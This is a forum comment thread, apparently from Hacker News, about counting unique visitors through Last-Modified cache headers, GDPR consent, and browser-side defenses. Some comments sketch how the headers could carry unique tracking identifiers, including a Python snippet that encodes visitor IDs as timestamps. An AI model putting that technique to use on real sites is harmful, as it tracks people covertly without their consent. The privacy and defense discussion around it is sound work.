> The laws don't care about cookies or other technical implementations, they care about tracking.
This is flat-out wrong. The law cares about any cookies that aren't strictly necessary for the site's operation. This very well might qualify as a cookie that isn't strictly necessary for the site's operation. It's not implemented as a cookie, but what you say is half right; "the laws don't care about... technical implementations". A judge might not care that you've come up with a clever way of storing your cookie with a different header. It's the same thing as a cookie, and it's not necessary for the site's operation.
Even the good guys are craven motherfuckers to you. Who does measure up to your standards of flawless perfection?
This is an analytics service that respects user privacy. We should be wishing them all the success in the world, not criticizing them for not meeting your ridiculous notions of HTTP header purity.
What a ridiculous notion! Using cookies when you want to set a cookie! Absurd! What we are trying to do is set a cookie while also proclaiming to the world that we don’t use cookies. What’s the matter with that?
I’m sorry, but “I want to sort of lie” is just not a very compelling reason to me. I guess I just have ridiculously high standards.
No need for this kind of hyperbole. I wouldn't ask this question if the OP's post didn't contain grandiose claims such as "No cookies, no consent banners, no ad networks, 100% GDPR & CCPA compliant, low footprint web analytics." OP made a claim about their compliance with EU law. I'm asking for proof or at least an explanation.
I think the comments on this post would probably be less hostile if the title said something like "detect the number of unique visitors", which is what I believe it's doing, rather than detecting unique visitors using unique timestamps, which is what many seem to be guessing based on the headline alone.
It would be interesting if it is also possible to abuse it. If it is possible to create enough unique timestamps, that browsers still accept them. Can you add milliseconds to the TS, and do browsers store them too? Or do browsers also accept timestamps from months or years back and re-send them? If you can use the whole scale of Unix time (int32), there is a huge pool of entropy available.
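Some back-of-the-envelope numbers for that entropy question, as a sketch. Whether browsers actually store and re-send arbitrary old dates is exactly the open question and is not tested here; the helper names are made up. HTTP dates only have one-second resolution, so milliseconds have nowhere to go in the header.

```python
import math
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime

SECONDS_PER_DAY = 24 * 60 * 60


def bits(n_values: int) -> float:
    """Bits of information in a choice among n equally likely values."""
    return math.log2(n_values)


def id_to_header(visitor_id: int) -> str:
    """Hypothetical abuse: encode an integer ID as a Unix-time HTTP date."""
    stamp = datetime.fromtimestamp(visitor_id, tz=timezone.utc)
    return format_datetime(stamp, usegmt=True)


def header_to_id(value: str) -> int:
    """Recover the integer from the date the browser echoes back."""
    return int(parsedate_to_datetime(value).timestamp())


print(f"one day of seconds: {bits(SECONDS_PER_DAY):.1f} bits")
print(f"non-negative int32 range: {bits(2 ** 31):.1f} bits")
```

A single day of second-resolution timestamps is already about 16.4 bits, and the non-negative int32 range is 31 bits, which is the gap between the counter in the article and an actual identifier.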
In this case they don’t do this evil thing, and it probably would still violate the European GDPR, even if it’s not an actual cookie, but somebody has to find it first.
Ooh that's kinda evil. A server could give a client a uniquely identifying ETag for a given URL. So whenever the client comes back on the same browser, they're identified.
Fortunately this is probably just as detectable as the Last-Modified abuse in the post.
The fact that this is being used in an analytics product that claims to be compliant with all privacy laws is horrifying. There’s no way this is compliant and it’s deceptive.
Arguably this can become personally identifiable, much like a person's height of 7 feet becomes personally identifiable. How many 7 foot people live in Elko, Nevada? (I have no idea, perhaps there's an entire colony of them.) But most very tall people, well, stand out. "You're that tall guy from Elko!"
Early on, it's not personally identifiable. No doubt there can be a lot of folks visiting the site only 10 times and never again.
But as someone continues to visit, they begin to narrow down who they are to "You're that guy that comes in here every day with a yellow hat". They may not "know" who you are but, they "know" who you are.
Eventually, there may be that one person that has the highest hit rate, who always stands out.
> You're that guy that comes in here every day with a yellow hat
Yes but you have absolutely nothing at all to associate that back to a person. Where are you going to find the data "personal information of some kind of the people who visit your site a lot?" You're not collecting it.
> Processing personal data to generate the cohort assignment without the proper consent could also be a violation
Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?
> Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?
Quoting the European commission:
"Personal data is any information that relates to an identified or identifiable living individual. Different pieces of information, which collected together can lead to the identification of a particular person, also constitute personal data."
I'd hazard a guess that it's the second part under which the EC might find this to be within scope.
The definition of personal data under the GDPR is anything that can be used to uniquely identify a natural person (with sufficiently high probability). Both cookies and date-modified meet that definition identically, as do IP addresses.
That doesn't mean you can't use it at all. It just places strong restrictions on what purposes you can use it for. The important point is just that those restrictions are the same under GDPR for all of these technologies. It doesn't matter how you uniquely identify users, what matters is what you do with that information.
They don't assign a unique date-modified to each user. They assign everyone the same date modified on their first visit of the day. I don't accept that this could be used to uniquely identify a natural person.
You may be able to look at the headers and see that a certain user made the most requests that day. That still tells you nothing about their identity.
Nothing in the technique described here makes it possible to identify an individual directly or indirectly, because the 'identifiers' are not unique and really no different from standard 'last-modified' dates. Even if they were unique, further data would have to be collected in order to identify individuals and turn everything into personal data.
What the technique may fall foul of, though, are cookie laws.
You can't just scare quotes anonymous without explaining how it could deanonymize you. You're sitting there with full access to the count data they collect. Use any statistical methods you like, figure out what visits were me.
That seems very different, as those cohorts are based on actual personal data (correct me if I’ve misunderstood this about FLoC). That’s fundamentally different from a counter I think.
Yes that’s right, FLoC is explicitly using personal data. But now consider that that data is “you visited a gardening website in the past month” and compare it with “you visited this website 3 times yesterday” and the two methods don’t look so different.
I guess we all have different instincts when it comes to this, but I find it much more expected and acceptable that a website can see that I’m returning, than that they get to know about random other interests I have based on my general browsing history.
The article you quote does not suggest that "assigning users into “anonymous” cohorts is ... is likely not GDPR compliant" and I fail to see how that would be the case. Rather it seems to mention concerns that processing personal data to do so may be problematic.
Storing a cache header is not an issue, but if it is used as a unique identifier for user analytics purposes, it is almost certainly personally identifying information, at least after combining with other data. Since they are not disclosing that they store something they use to ID users, it is likely a GDPR violation, at least in spirit, and that spirit is exactly what GDPR seeks to control.
It is personal data regardless of how it is used. The only question is whether that use of personal data is permissible.
Using it for user analytics, which is neither required to run the service, nor in the user's interest, nor reasonably expected by the user, is almost definitely illegitimate use.
This is a form of data collection and tracking that is definitely against GDPR unless the user is informed of it and consents to it. As it stands, there is no such notification or consent. IANAL but I strongly suspect it will get you fined in the EU.
GDPR doesn't just cover personal info, it also forbids tracking without consent, which includes cookies and other means. This is just a technical trick to track someone sans cookie, so I'm 100% certain they will fine anyone doing it unless they get consent.
The GDPR is entirely about personal data stored by the processor [0]. In principle, if the tracking is entirely client-side, and never produces any traces in how the client accesses your server, then the GDPR alone has no ability to stop it. (Not to say that it cannot run afoul of other regulations.) If the results of the tracking are somehow sent back to your server, then it most likely becomes personal data subject to the GDPR.
Only multiple requests within a given second get the same time stamp. So if you have less than 86k hits per day, then all your time stamps could be unique.
Edit: I misread the article here, where it said each visit incremented the counter by one second. So my calculation is not correct!
It is designed to track unique visitors, but not differentiate between them at all.
both you and i visit the same new site today, we both get a file our browser caches with today's date at 00:00:01. Tomorrow when we go to the same site, our browser says we got the file yesterday, so the server sends a new modified date to the browser, set to tomorrow's date at 00:00:02. Both of us have the same "new" file with the new modification date/time.
if i go back the following day, the only thing the server knows for certain, from just this header, is that i've visited twice before. So i'm not counted as a unique visitor.
That this could be used by assigning a unique timestamp to each visitor is where everyone's mind is going, and it feels like half are annoyed there's another way to leak information, and the other half are annoyed they didn't think of it prior to the end-of-year marketing bonus deadline.
The technique could be used for a lot of tracking.
However, it sounds like they're using it just for quite minimal tracking. It sounds like the only thing they're tracking is how many people viewed the site how many times. They'll know that on a particular day, 1 person viewed the site 500 times, but won't know anything identifying about that person (e.g. IP, name, gender, any sort of unique ID).
It is not a unique timestamp though. Each day, all visitors start at 00:00:00. All users that visit the site a second time get the timestamp 00:00:01 and so on.
Where are people getting these insane reads of GDPR? Any bit of entropy is not going to violate GDPR. First, an active client-server connection is required for any kind of supposed "identity" contained here, which would of course include far more unique bits of identity/entropy, such as IP. Secondly, even if the full DB of page view counts were leaked you could not actually use it to identify a user.
You have somehow perverted GDPR to believe it to mean `no client may ever hold a unique state`. Good luck to anyone making a claim that this is NOT possible in anything but the most rudimentary application.
I agree. Well crafted laws (like the GDPR) forbid any kind of tracking without consent. It’s the what and not the how. It doesn’t matter if it’s via cookies or any other way.
Important to note that privacy laws that regulate tracking are not limited to the Cookie header. They apply to tracking and data collection in general, regardless of how technically clever you make it.
This is part of why I quit my privacy focused analytics start-up years ago. I won’t name it directly, but it was one of the first and is still going strong (although not really open-source anymore).
People kept asking for cookieless tracking but with another way of identifying returning visitors that was always worse from a privacy standpoint. Cookies can be controlled by the client, anything stored on the server can not.
Honestly, cookies are pretty nice, it’s the law around this that sucks. Tricks that attempt to bypass the laws will surely only work for a limited time, at least I hope they will…
Exactly. They could have the same functionality and privacy characteristics if they simply kept a cookie that incremented each time the site was visited. The fact that they didn't go this route suggests this is more about finding a way to track unique visitors when cookies are disabled. They are deliberately subverting the user's desire to not be tracked and spinning it as a privacy win.
If it was about tracking users, wouldn't they generate a unique timestamp per visitor on the first visit? Giving everyone the same timestamp is a terrible way to try and track individuals.
Well, yes you could have a cookie with C=C+1 and carefully set the expiration to the end of the day (like the article), or you could use randomly generated last-modified times and deduplicate server-side (similar to how cookies are usually used), but I can think of a few reasons the cache would give greater precision, so even if a lot of the same things are the same, I'm not so sure it's really "no different"; these things are pretty important to (some) publishers:
- third-party cookie blocking/notification features in browsers
- review processes on ad networks checking for actual cookies rather than suspicious last-modified times
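For comparison, the cookie version mentioned above (C=C+1, expiring at the end of the day) might look like the sketch below. The cookie name `c` and the attribute choices are assumptions, not anything from the article.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime
from typing import Optional


def counter_cookie(cookie_value: Optional[str], now: datetime) -> str:
    """Build a Set-Cookie value holding today's hit count for this browser."""
    try:
        count = int(cookie_value) + 1 if cookie_value is not None else 1
    except ValueError:
        count = 1  # unparseable value: start over
    midnight = now.astimezone(timezone.utc).replace(
        hour=0, minute=0, second=0, microsecond=0
    )
    end_of_day = midnight + timedelta(days=1)  # counter resets with the UTC day
    expires = format_datetime(end_of_day, usegmt=True)
    return f"c={count}; Expires={expires}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

The stored state is the same small integer either way; what differs is which header carries it and which browser controls and review processes can see it.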
On the other hand, now that we know about it, it is easy to defeat: a privacy-conscious browser will just add a random number of minutes/seconds to the "If-Modified-Since" header. The only risk is you sometimes trigger a reload because the resource was modified in that interval.
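A sketch of what that client-side fuzzing could look like. This is hypothetical browser behaviour, not something any browser is known to ship; the function name and the one-hour default are assumptions.

```python
import random
from datetime import timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional


def fuzz_if_modified_since(
    last_modified: str,
    max_jitter_seconds: int = 3600,
    rng: Optional[random.Random] = None,
) -> str:
    """Return an If-Modified-Since value shifted forward by a random amount."""
    rng = rng or random.Random()
    stored = parsedate_to_datetime(last_modified)
    if stored.tzinfo is None:
        stored = stored.replace(tzinfo=timezone.utc)
    jitter = timedelta(seconds=rng.randint(0, max_jitter_seconds))
    # The exact second the server handed out is no longer echoed back.
    fuzzed = stored.astimezone(timezone.utc) + jitter
    return format_datetime(fuzzed, usegmt=True)
```

How much caching this costs depends on how the server compares the date: one that requires an exact match will treat every fuzzed value as a miss, while one that compares "newer than" could answer 304 for a change made inside the jitter window.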
Looks like a nice middle ground between no tracking at all and needing full tracking to see how well your website performs. It seems no fingerprinting is involved, so the website visitor stays anonymous. Unlike cookies, where we can store whatever we like, this method reveals only the unique visit and its derivatives.
The missing piece is that no fingerprint is involved. They don't have a way of identifying that user, but they are still able to count the number of times that visitor loads the page. So, it's not a tracker, it's a counter. It's like a loyalty punch card at your local sandwich shop -- they can track how many times you've been there by counting the hole punches, but they don't have a unique identifier, so they can't track details about those visits.
On the other hand, a cookie or a browser fingerprint contains info that can uniquely identify that user so it can be used for tracking.
Fair enough. At least they've told us how it works, so if the data no longer matches that methodology in the future then we can speculate that they've implanted a UID, unless they tell us how it works again and the data is consistent with the new methodology.
Tracking without consent is illegal in Europe, regardless of the method. Alternative tracking methods are not workarounds to get around the law; they are only workarounds in trying not to be caught.
Tracking without consent is illegal. This is a clever way to get absolutely reamed, because you’re not only in breach of data protection laws you’re actively trying to obfuscate it.
Yeah nice try. Law makers are not that stupid. Any way of storing personal data is subject to this regulation.
And before you try the next thing, personal data is everything that can be linked to a specific user, e.g. IP addresses have been ruled to be personal data, some uuid that helps you identify a user as well.
People should really read the law, and/or at least literate commentary on it instead of assuming things or repeating what someone else assumed.
This is definitely not personal data. The piece of information is not linked to an individual and cannot be used to identify an individual (not the same as a 'user'), not least because it is not unique to each visitor: According to the article all first requests get the same 'last-modified' date, same for all second requests, etc.
Still, this stores data in the browser in a way that might be deemed a technology similar to a cookie, and therefore this might still fall within the various cookie laws, but this is completely outside of personal data regs.
That’s pretty clever. I think if you really want to keep it privacy respecting, you should stop counting at 1 - so you can distinguish the first vs subsequent visits, but you can’t tell if someone has visited 2 or 200 times.
I am having trouble understanding how knowing someone has visited three times is more privacy invasive than knowing they visited twice. What is so magical about 3?
Consider that there’s some long tail of visitors who visit many times in one day. Someone is going to be visiting more times than anyone else, whether that’s 10 or 100 or 1000 page views. That person is now uniquely trackable. To avoid that situation you need to stop counting somewhere, and you’re not really getting any new info after 1 (well, 2 I suppose, if you want to track bounces), so you might as well stop there.
I don't agree that the existence of this header makes a user more trackable. You can already uniquely identify visitors with their IP & source port, which is included in every single packet and is way more specific than some timestamp.
Your argument seems to be that this timestamp in the header could possibly be used as a lookup key in a database of visitors. I think that's a stretch, but in any case that database would be the privacy violating thing. This header is completely anonymous.
You’re probably right! But since they aren’t getting any more info by continuing to count after 2, it’s just a liability to do it. After all, the whole point of the setup seems to be to minimize the amount of unique information the system has to process.
what is the problem with letting a website know how many times I have visited the page? How is it better for a website to only know if I have visited earlier or not?
Makes sense. I’m not very experienced in privacy but could you explain why uniquely identifying the user is a problem? As in you can tell that there’s one user who visited 100 times but how can you use that information to correlate with an identity?
It is materially different because it does not track individual users.
It's comparable to dropping the same cookie to every visitor on a particular day; a pretty low level of privacy invasion.
Also, this makes it possible to collect meaningful statistics without using things like the visitor's IP address, which is a privacy win for the user, and an accuracy win for the site operator.
who says Last-Modified has to be a current date? you've got the potential for 1669827111 users as of when I was composing this comment without giving your users future dates.
There are also many timezones and you can encode information in the timezone indicator as well. Also, you can use different days. You can stretch this number into millions. For a website that gets a certain number of unique visitors per year, this may be unique enough.
Because the cache key for the site is partitioned by top-level origin in modern browsers, they wouldn't get any additional information this way that they couldn't get with existing first-party storage techniques, such as service worker caches, session cookies, IndexedDB, etc. See e.g. https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P... for example. Opening a new incognito window would trivially defeat this method of "tracking". This is basically just a very small first-party-only cookie.
The demo doesn't work in safari on my mac. It sometimes gets to 2, but on refresh goes back to 1. Actually, got it up to 4 one time. Seems like the claims of "Works in any browser and any server" are overstated.
Same. I got it up to 8 by clicking into the address bar and hitting enter. However, doing a refresh instead caused it to reset (the browser didn't send the If-Modified-Since header, so the server didn't do its little trick and instead started over).
The page lastmodified.normally.com claims "Works in any browser or any server". What if the browser has no Javascript engine.
In this case I tried the demo with a browser that has a JS engine, with JS enabled, and the demo still did not work. That is because "ping.withcabin.com" was not disclosed to the user. The OP suggests that users access "lastmodified.normally.com". It says nothing about accessing "ping.withcabin.com". As such, the proxy does not contain any address info for that domain. The user (me) never typed it.
Instead of a browser, I use a localhost-bound forward proxy to control requests and responses, including HTTP headers. The proxy contains all of the domain-to-IP address mappings I need in memory. Why should I add an IP address for "ping.withcabin.com". The request returns no content.
1. For example, something like
acl cabin hdr(host) -m str ping.withcabin.com
http-request del-header If-Modified-Since if cabin
http-response del-header Cache-Control if cabin
http-response del-header Last-Modified if cabin
Hm, on Safari 16.1 it seems reloading twice clears the cache and therefore the counter (but e.g. cmd-W cmd-Z cmd-R will safely increase it). Either way, I think I would prefer this behaviour to be some sort of cookie that the law okays, because as everyone else has said, I'm quite sure browsers will fuzz these data.
(I would probably go for a Gaussian fuzzer each visit, just because it adds the off chance that it's quite a way away from any attempted ID, making it a little bit more difficult to cast a wider net and get a few bits of entropy)
Change 'last-modified' to use a secure hash of the contents, like sha256. Then the browser can detect if a website is giving bad hashes, potentially using them for tracking.
ETags can be anything -- they aren't required to be a hash of the content.
Thinking about this problem, why does the browser expose any information about what's in the cache? Client-side JavaScript can't tell what's in the cache because it's an obvious security issue. Why let the server know?
Browsers should ask for the hashes on a list of content without exposing their cache contents. Then the browser can request anything that's changed.
The way If-None-Match works is that the browser says "give me the latest if this ETag represents an out-of-date resource, otherwise I'll keep using my copy." It's not clear to me how you're proposing this work instead?
(Also, in many cases the server uses a hash of the inputs to generating the resource, which isn't something externally verifiable)
ETag doesn't have any assurance that it's a hash of the page contents: the current protocol doesn't stop the server from embedding arbitrary information in the ETag, and there's no way for the client to tell.
Neither does Last-Modified, as we just saw. If we were going to alter the meaning of a header for this, it should be ETag. Just agree on ETag formats that browsers can verify are just hashes, and have them throw away any opaque ETags or dates.
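To make the idea concrete, a client-side check for a verifiable ETag could look like this sketch. The `sha256-` ETag format is invented here for illustration; no such agreed format exists today.

```python
import hashlib
from typing import Optional

PREFIX = "sha256-"  # hypothetical agreed-upon ETag format


def make_etag(body: bytes) -> str:
    """ETag a cooperating server would send: a quoted hash of the body."""
    return f'"{PREFIX}{hashlib.sha256(body).hexdigest()}"'


def etag_to_keep(etag: Optional[str], body: bytes) -> Optional[str]:
    """Keep the ETag only if the client can verify it against the body.

    Anything opaque or mismatched is dropped, so it is never echoed
    back in If-None-Match and cannot carry an identifier.
    """
    if etag is not None and etag == make_etag(body):
        return etag
    return None
```

The trade-off is that any resource whose ETag fails the check loses conditional revalidation for that client.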
You'd need to introduce something new for that. Many servers compute ETags today as hashes of inputs to a process.
(Which is nice computationally, since you can immediately say "not modified" instead of building the response, hashing it, and throwing it away if the hash matches)
Well, I said "just hashes" for short, but such ETag formats could agree on other algorithms as well, as long as the browser can verify them.
And introducing a new method doesn't solve the issue of deprecating the existing abusable methods, which is why I suggested one that can already be implemented by privacy-first browsers one-sidedly. Servers would then be pressured to migrate to some friendly ETag format if they don't want to completely lose client-side caching for a (hopefully growing) share of their userbase.
> This is great for privacy as we don't need to use cookies, IP addresses, fingerprinting or unique identifiers. In our tests, this method proved durable enough to be the most reliable method of counting unique visitors without using cookies.
The differences with a cookie are that the header is named Last-modified instead of Set-Cookie and Cookie, and the value must be a datetime in the RFC2616 format.
How is it good for privacy? I think it’s worse because it’s invisible to the user. I would bet tracking visitors using such a hack isn’t compatible with GDPR, which requires informed consent for tracking. And good luck explaining your hack to the average visitor.
You seem to slightly misunderstand how GDPR works. Tracking in and of itself is not the problem, it's personal data and personally identifying data that is. You can count how many hits your server receives no problem, this is roughly the same idea.
This is equivalent to setting a cookie with a hit count. It's still storing & submitting information, it's just not using a unique identifier (Which is pretty privacy-respecting, I'm not saying it's a terrible thing or something).
I assume it will be treated as such, too. If you can use a cookie to do this without consent, this is fine too. If you can't then it's not. The same happens for local/session storage: it's cookie-equivalent.
By that measure, any users behind a unique single IP (no IP pooling, no CGNAT, etc.) will always be uniquely identifiable. And for IP there are far fewer steps to personally identify the user. The server necessarily sees the user's IP.
Yes, the IP can be used to identify people. If you want to track users using their IP and respect GDPR, you need to get their consent first.
The best approach is not to store them before you get consent. Having a temporary access log with a few IPs is probably fine. But keeping all your access logs forever for analytics purposes is not fine anymore.
> Natural persons may be associated with online identifiers provided by their devices, applications, tools and protocols, such as internet protocol addresses, cookie identifiers or other identifiers such as radio frequency identification tags. This may leave traces which, in particular when combined with unique identifiers and other information received by the servers, may be used to create profiles of the natural persons and identify them.
Basically the “cookie consent” part in the EU stems from the e-privacy directive. Article 5.3 refers to GDPR (through the directive that is replaced by GDPR) and reads:
> Member States shall ensure that the storing of information, or the gaining of access to information already stored, in the terminal equipment of a subscriber or user is only allowed on condition that the subscriber or user concerned has given his or her consent, having been provided with clear and comprehensive information, in accordance with Directive 95/46/EC, inter alia, about the purposes of the processing. This shall not prevent any technical storage or access for the sole purpose of carrying out the transmission of a communication over an electronic communications network, or as strictly necessary in order for the provider of an information society service explicitly requested by the subscriber or user to provide the service.
In short, this method may fall under the EU “cookie law” above. The use of timestamps may require consent if they are used to distinguish users (even if only for counting purposes). The timestamps may then also be personal data under the GDPR.
The client should be able to detect that the dates are not valid (and that their precision is wrong), and avoid sending an "If-Modified-Since" header. (The same would be true if they were assigned at random rather than sequentially like this; it should still be able to detect that they are not valid and have the wrong precision.)
What's the reason for not storing a cookie? It's not like browsers that don't support cookies are targeted, right? Cookies can also be "great for privacy", if their power is not abused server-side ...
Time of last access + a counter of your visits once your hits reach N>2 is probably enough to separate an individual from the crowd here, unless your site is tremendously busy.
To be clear, they’re not generating unique headers. They’re setting them to the day start, so they can tell if the requester has already been to the site today or not. It actually seems pretty reasonable.
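For anyone who wants to see the shape of it, here is a rough sketch of the day-start idea in Python. This is my reading of the description above, not their actual code: `handle_hit` and `day_start` are made-up names, and a real deployment would also need cache headers that make the browser revalidate on every visit.

```python
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime
from typing import Optional, Tuple


def day_start(now: datetime) -> datetime:
    """Midnight UTC of the day containing `now` (which must be timezone-aware)."""
    return now.astimezone(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)


def handle_hit(if_modified_since: Optional[str], now: datetime) -> Tuple[bool, str]:
    """Return (is_new_visitor_today, Last-Modified value to send back).

    Hypothetical helper: every visitor gets the same timestamp on a given day,
    so the header only says "seen today or not", not who the visitor is.
    """
    today = day_start(now)
    seen_today = False
    if if_modified_since:
        try:
            seen_today = parsedate_to_datetime(if_modified_since) >= today
        except (TypeError, ValueError):
            seen_today = False  # unparseable or zone-less header: count as a first visit
    return (not seen_today, format_datetime(today, usegmt=True))
```

The first request of the day carries no matching header and bumps the unique counter; later requests echo today's midnight back and are counted as repeats.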
The way they are using it provides less information than a UID cookie would, but the same amount of information as a boolean "previously visited" cookie. However, now that the technique is known there is nothing stopping people from using the same method to store a UID date, and privacy-protecting clients will have difficulty differentiating between the two, so best to eliminate this as a fingerprinting method altogether.
People keep saying in this thread "there is nothing stopping people from using the same method" to do something else! I think that this is an irrelevant criticism. This is a valid attempt to minimize the amount of information collected on visitors and still provide a unique-visitors-per-day count, and the fact that someone could build a similar but different system that looks like a cookie isn't relevant.
They demonstrated a PoC that uses an HTTP feature in a way it wasn't intended to add entropy to fingerprinting techniques. Discussing how this same exploit could be used maliciously by others and how to prevent that isn't criticism of the PoC, it is standard security practice.
But you can't have as many bits in a UID date as for a generic cookie, and a privacy protecting client could just ignore the ones that don't make sense. Does a 1978 date make sense? Probably not. You could scale this up to the millions, probably, but it won't scale infinitely.
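A client-side plausibility check along those lines could be as small as this. It is only a sketch: `EARLIEST_PLAUSIBLE` is a cutoff I picked for illustration (nothing on the web should predate 1990), and `looks_plausible` is a hypothetical helper, not something any browser ships as far as I know.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Assumed cutoff for illustration only: dates before the web existed are suspicious.
EARLIEST_PLAUSIBLE = datetime(1990, 1, 1, tzinfo=timezone.utc)


def looks_plausible(last_modified: str, now: datetime) -> bool:
    """True if a Last-Modified value is parseable, not in the future, and not absurdly old."""
    try:
        lm = parsedate_to_datetime(last_modified)
    except (TypeError, ValueError):
        return False
    if lm.tzinfo is None:
        # "-0000" parses as a naive datetime; treat it as UTC so it can be compared
        lm = lm.replace(tzinfo=timezone.utc)
    return EARLIEST_PLAUSIBLE <= lm <= now
```

A client would simply not store (or not echo back) any value for which this returns False. It shrinks the usable range but does not remove it, which is the "won't scale infinitely" point.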
Roblox has ~50mm daily active users (DAU), and if my math is correct (it probably isn't) you could have hour-granularity timestamps (only 0-23) on 6 files, each day, and track 191mm unique users. I used Roblox because I knew their DAU off the cuff; because Roblox requires a login, they know who you are anyhow.
But if you do 1 second granularity a mere 2 cache timestamps are enough to fingerprint everyone on the planet, each day.
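Checking the arithmetic, assuming each cached file carries an independent timestamp (`distinct_ids` is just a name for the exponentiation):

```python
def distinct_ids(values_per_timestamp: int, cached_files: int) -> int:
    """Number of distinct combinations when each file carries one independent timestamp."""
    return values_per_timestamp ** cached_files


hourly_six_files = distinct_ids(24, 6)                 # hour of day on 6 files
per_second_two_files = distinct_ids(24 * 60 * 60, 2)   # second of day on 2 files

print(f"{hourly_six_files:,}")      # 191,102,976
print(f"{per_second_two_files:,}")  # 7,464,960,000
```

So 191mm holds up. Two per-second timestamps give about 7.46 billion combinations, which is slightly under a world population of roughly 8 billion; a third file removes any doubt.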
There probably is one already: this method is so old that the documentation of privoxy shows[1] how to defeat it. I can confirm it works: their example[2] website says I've visited 61996 times.
Sending a garbage Last-Modified time might confuse the server and cause unpredictable problems for the user. Blocking it is safe because the server will just assume this is the first time the user has visited the website.
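The blocking variant is about as simple as a filter gets. This is an illustrative sketch only, not how Privoxy implements it; `strip_conditional_date` is a made-up name.

```python
from typing import Dict


def strip_conditional_date(request_headers: Dict[str, str]) -> Dict[str, str]:
    """Return a copy of the request headers without If-Modified-Since.

    Header names are case-insensitive, so compare on the lowercased name.
    """
    return {
        name: value
        for name, value in request_headers.items()
        if name.lower() != "if-modified-since"
    }
```

The cost is that every such request becomes an unconditional GET, so the server sends the full body instead of a 304.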
This allows site owners to get statistics on page views/uniques/bounces without unique identifier cookies or JavaScript injections.
I’m all for blocking any abusive tracking methods, but this looks to me like creative website statistics that works for a single domain. What’s the harm in measuring that?
While this particular implementation doesn't track individuals, couldn't you trivially start tracking individuals by sending them unique random times like last-modified: 12 Mar 1978 12:34:56 GMT, thereby giving them a ~30 bit unique identifier for as long as the file is cached?
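The ~30 bit figure checks out if you assume one-second resolution and a usable range from 1978 to roughly now (the 1 Jan 1978 and 1 Nov 2022 endpoints below are my own picks for the estimate):

```python
import math
from datetime import datetime, timezone


def identifier_bits(start: datetime, end: datetime) -> float:
    """Bits of information in one timestamp chosen at 1-second resolution from [start, end)."""
    seconds = int((end - start).total_seconds())
    return math.log2(seconds)


bits = identifier_bits(
    datetime(1978, 1, 1, tzinfo=timezone.utc),
    datetime(2022, 11, 1, tzinfo=timezone.utc),
)
print(f"{bits:.1f}")  # 30.4
```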
Only if you disregard the amount of latitude that the semantics of these headers give to UAs that would effectively thwart this method of tracking.
If I fetch your /foo.html today in November 2022, and you send me a last-modified from 1978, that gives me and my UA a huge range from which to select a different datetime (anywhere between the 1978 value and now-ish) on my next request. How are you going to correlate my original and subsequent requests if in the latter I ask if you've got a copy that's been modified since 1999?
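Sketched in Python, that UA-side latitude might look like the following. The function name is hypothetical, and I'm assuming the safe window is anything between the server's Last-Modified and the moment the UA actually fetched the copy.

```python
import random
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime


def blurred_if_modified_since(last_modified: str, fetched_at: datetime, rng: random.Random) -> str:
    """Pick a random If-Modified-Since between the server's Last-Modified and our fetch time.

    Any instant in that window asks the same question ("changed since I got my copy?"),
    so the exact value the server handed out never has to be echoed back.
    """
    lm = parsedate_to_datetime(last_modified)
    if lm.tzinfo is None:
        lm = lm.replace(tzinfo=timezone.utc)  # "-0000" parses as naive; treat as UTC
    lm = lm.astimezone(timezone.utc)
    window = int((fetched_at - lm).total_seconds())
    if window <= 0:
        return last_modified  # nothing to blur: Last-Modified is at or after the fetch
    offset = rng.randint(0, window)
    return format_datetime(lm + timedelta(seconds=offset), usegmt=True)
```

One caveat: some servers compare If-Modified-Since for an exact match rather than "on or after", in which case a blurred value just costs you a full 200 response instead of a 304.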
Context is important. The replied-to comment starts off, "While this particular implementation doesn't track individuals, couldn't you trivially start tracking individuals by[...]"
An acceptable response, then (to both you and the original commenter), follows: "While some particular browser version doesn't currently protect individuals from that proposed form of tracking, any browser vendor could trivially start thwarting that form of tracking by exploiting the latitude afforded to UAs by the semantics of these headers." And that's the form that the previous comment takes and how it should be understood. The fact that "users go to the web with the browser they've been given [i.e., today, and which isn't providing this sort of tracking protection]" doesn't change anything; we are explicitly talking about steps that each side _can_ take in the arms race related to the subject of this discussion...
Allowing websites to get a somewhat accurate count of visitors plus bounce rate helps them to tell how they’re doing. Hopefully, they use that to guide developing a better product/service.
If you can allow them to do that without getting tracked, it’s win-win. You get a better experience when they build a better service.
I very much prefer this to e.g. fingerprinting. This is local to one site and basically records uniqueness only rather than an identifying ID. I don’t feel “tracked” or “targeted” by this.
> Many privacy-focused analytics services will generate and store a UID on the server instead of saving it in a cookie - based on a hash of your User Agent, IP, Location, Date etc.
What location? The Geolocation API?
What date? How can a date contribute to a UID? Each visitor sends multiple HTTP requests at different dates.
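My guess (an assumption; the quoted text doesn't spell it out) is that "Date" means the calendar day rather than the request time, so the same visitor hashes to the same ID all day and to a different one tomorrow. Something like this, where `daily_visitor_id` and the `salt` parameter are hypothetical:

```python
import hashlib
from datetime import date


def daily_visitor_id(ip: str, user_agent: str, day: date, salt: str) -> str:
    """Hash that is stable for one visitor within a calendar day and changes the next day.

    Assumed scheme for illustration; `salt` stands in for a server-side secret.
    """
    material = "|".join([salt, day.isoformat(), ip, user_agent])
    return hashlib.sha256(material.encode("utf-8")).hexdigest()
```

Every request on the same day from the same IP and User-Agent collapses to one ID, which is all a daily unique count needs.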
...at the cost of caching (or at least a round trip).
Is it necessary to know how many visits per day a particular user made? If # of unique visitors per day/week/whatever is sufficiently granular you could retain a corresponding cache window.
Also, if this is to avoid those cookie warnings that got popular after GDPR, it should be noted you're still storing information on users' computers, i.e. the stuffed metadata is not so different in principle from a cookie. In this case it seems innocuous, but I wouldn't be surprised to see sites exploit your trick to store a unique last-modified date for each user as a method of tracking (if that's not already commonplace).
The number of unique visits in a day is the number of total visits minus the number of repeat visits from the same users, so they need something like this to get an accurate count. You can't produce the number without information on repeat visitors.
I think you are right that this technique could be changed and turned into a way to track individual users. But as implemented, it doesn't do that, and all knowledge is lost after one day. We shouldn't criticize people who are trying to limit the information they collect to the bare minimum by pointing out an altered version of their system might have undesirable properties.
